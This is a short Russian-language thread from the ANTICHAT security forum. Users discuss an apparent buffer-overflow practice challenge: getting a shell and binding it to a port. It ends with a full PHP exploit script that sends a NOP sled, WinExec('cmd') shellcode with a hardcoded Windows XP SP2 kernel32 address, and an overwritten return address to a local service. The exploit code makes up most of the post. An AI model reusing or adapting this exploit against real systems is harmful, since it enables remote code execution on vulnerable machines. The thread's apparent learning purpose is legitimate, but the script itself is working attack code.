ANTICHAT — форум по информационной безопасности, OSINT и технологиям

я же сказал, что cha0s медлит я уже написал

Ну а когда будет примерно всё готово.То Егор кинул (вот это я НИКОГДА не говорил, я сказал что он был занят - прим. кез) ,то этот медлит.

а мне нравится что Kez медлит я успел допереть сам (не до шелла пока конечно)
.... много чего еще понял по пути к победе...

Слушайте, кто-нибудь уже шелл заклепал??
А то я уже...
А вот кто бы мне помог его на порт повесить?? Ниче не получается.
Если кто повесил, отпишите пожалуйста. Мне интересно, в чем моя ошибка.

все там получается. хотя не скажу что это очень просто...

Вашу... Я же немогу выложить то что я написал, НЕ ПОКАЗАВ как сделать bind

Да за это время можно было 500 раз переполнить и шелл написать.

Что-то затихли все...
Что статья уже вышла??

<?
# fl - Вызов функции fl()
# cmd - запуск командного интерпретатора - cmd.exe
$overflow = "cmd";

# WinExec адрес - kernel32.dll
# Чтобы достать адрес WinExec, качаем прогу:
# http://nst.void.ru/download/arwin.exe
# Usage:
# arwin.exe kernel32.dll WinExec
# Result: WinExec is located at 0x7c86114d in kernel32.dll
# # # # # # #
# WinXP -
# WinXP sp1 -
# WinXP sp2 - \x4D\x11\x86\x7C (7C86114D)
# # # # # # #
# Win2k sp1 -
# Win2k sp2 -
# Win2k sp3 -
# Win2k sp4 -
# # # # # # #
# Win98 -
# Win98 SE -
# # # # # # #
$winexec_addr = "\x4D\x11\x86\x7C";


# exploit
$srv = fsockopen("127.0.0.1", 8877);

if($overflow=="fl") $eip = "\xA8\x10\x40\x00";

if($overflow=="cmd") $eip = "\xC4\xFE\x12\x00";

for($i=0; $i<77; $i++) $nop .="\x90";
$nst = "waaaaa".
# cmd
"\x33\xC0\x50\x68\x43\x4D\x44\x20\x54\xB8".
$winexec_addr.
"\xFF\xD0\xEB\xFE".

$nop.
"AAAA". # EBP
$eip; # EIP

fwrite($srv, $nst);
print "Shellcode length:".strlen($nst);
?>